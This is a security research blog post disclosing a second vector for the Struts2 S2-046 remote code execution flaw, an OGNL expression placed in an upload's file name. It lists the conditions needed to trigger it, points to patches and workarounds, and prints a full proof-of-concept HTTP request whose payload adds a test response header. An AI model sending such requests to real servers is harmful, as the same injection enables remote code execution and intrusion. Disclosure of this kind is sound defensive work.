Security Research
cancel
Showing results for 
Search instead for 
Did you mean: 

Struts2-046: A new vector

Struts2-046: A new vector

alvaro_munoz

Last week a new Remote Code Execution (RCE) vulnerability affecting Struts2 was published. We already blogged about it so we will not get into the details of how Struts2 was vulnerable via the Content-Type header. Today's blog will focus on how important it is to analyze and understand bugs when they are made public. In this case, we wanted to verify that Fortify SCA was able to detect this vulnerability when scanning the involved source code (Struts2 + Apache Commons-FileUpload) but we were surprised to find out that in addition to the known attack vector via the Content-Type header, SCA also reported a different dataflow originating from the file name in the multipart request. The analysis evidence trace looks like this:

Picture1.pngReading through the code it was clear that it was a true positive that could be triggered if the following requirements were met:

  • JakartaStreamMultipartRequest is used. This requirement implies that the Struts2 application needs to be configured to use the Jakarta stream parser which is not the default one.  Check for the following configuration in your Struts2 configuration files:  <constant name="struts.multipart.parser" value="jakarta-stream" />
  • The size of the uploaded file, as stated by the Content-Length header, is bigger than Struts2 maximum allowed size (2GB).
  • The file name contains an OGNL payload.

If these requirements are met, Struts2 vulnerable versions would craft an exception containing the attacker-controlled file name and then proceed to localize the error message using the OGNL value stack which will interpolate any OGNL variables (${} or %{}) evaluating them as OGNL expressions.

A malicious request could look like the following:

POST /doUpload.action HTTP/1.1

Host: localhost:8080

Content-Length: 10000000

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z

Connection: close

 

------WebKitFormBoundaryAnmUgTEhFhOZpr9z

Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"

Content-Type: text/plain

Kaboom 

------WebKitFormBoundaryAnmUgTEhFhOZpr9z--

The issue was reported to Struts2 team, which published a new security bulletin (S2-046) which details the affected versions, patches, and workarounds for additional vectors. Note that existing patches for 2.3.x and 2.5.x branches, released as a fix for S2-045 also protect against this vulnerability. If for any reasons, it is not possible for you to upgrade to secure versions (2.3.32 or 2.5.10.1), a new plugin has been developed by the Struts2 team as a drop-in solution.

Please review any temporary workarounds you may have put in place as Servlet filters, WAF rules, and the like, and make sure they account for all the attack vectors: Content-Type and Content-Disposition.

Stay secure!

 

 

 

 

0 Kudos
About the Author

alvaro_munoz

Labels
//Add this to "OnDomLoad" event